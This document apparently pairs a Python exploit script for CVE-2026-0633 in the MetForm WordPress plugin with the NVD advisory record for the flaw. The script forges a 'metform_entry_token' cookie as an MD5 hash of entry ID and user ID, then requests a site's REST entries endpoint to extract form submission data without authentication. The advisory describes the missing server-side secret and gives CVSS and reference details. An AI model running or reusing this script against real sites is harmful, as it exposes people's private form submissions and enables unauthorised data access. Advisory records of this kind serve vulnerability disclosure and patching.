CVE-2026-0633

import hashlib import requests from datetime import datetime TARGET_URL = "https://vulnerable-site.com" ENTRY_ID = 123 # 目标表单条目ID USER_ID = 1 # 任意用户ID def generate_forgeable_cookie(entry_id, user_id): """Generate forgeable cookie value based on entry ID and user ID""" data = f"{entry_id}:{user_id}" cookie_value = hashlib.md5(data.encode()).hexdigest() return {"metform_entry_token": cookie_value} def exploit_sensitive_data(): """Exploit CVE-2026-0633 to access form submission data""" headers = { "User-Agent": "Mozilla/5.0", "Cookie": "; ".join([f"{k}={v}" for k, v in generate_forgeable_cookie(ENTRY_ID, USER_ID).items()]) } # Exploit via shortcode endpoint params = {"entry_id": ENTRY_ID} response = requests.get(f"{TARGET_URL}/wp-json/metform/v1/entries/{ENTRY_ID}", headers=headers, params=params, timeout=10) if response.status_code == 200: print(f"[+] Successfully extracted form data at {datetime.now()}") print(f"[+] Response: {response.json()}") else: print(f"[-] Exploitation failed: HTTP {response.status_code}") if __name__ == "__main__": exploit_sensitive_data()

{"cve": {"id": "CVE-2026-0633", "sourceIdentifier": "[email protected]", "published": "2026-01-24T09:15:52.843", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.1.0. This is due to the use of a forgeable cookie value derived only from the entry ID and current user ID without a server-side secret. This makes it possible for unauthenticated attackers to access form submission entry data via MetForm shortcodes for entries created within the transient TTL (default is 15 minutes)."}, {"lang": "es", "value": "El plugin MetForm – Contact Form, Survey, Quiz, & Custom Form Builder para Elementor para WordPress es vulnerable a la Exposición de Información Sensible en versiones hasta la 4.1.0, inclusive. Esto se debe al uso de un valor de cookie falsificable derivado únicamente del ID de entrada y del ID de usuario actual sin un secreto del lado del servidor. Esto hace posible que atacantes no autenticados accedan a los datos de entrada de envío de formularios a través de los shortcodes de MetForm para entradas creadas dentro del TTL transitorio (el valor predeterminado es 15 minutos)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3438419/metform", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d72cc420-1ff5-403b-b4ea-7c820fdebcf3?source=cve", "source": "[email protected]"}]}}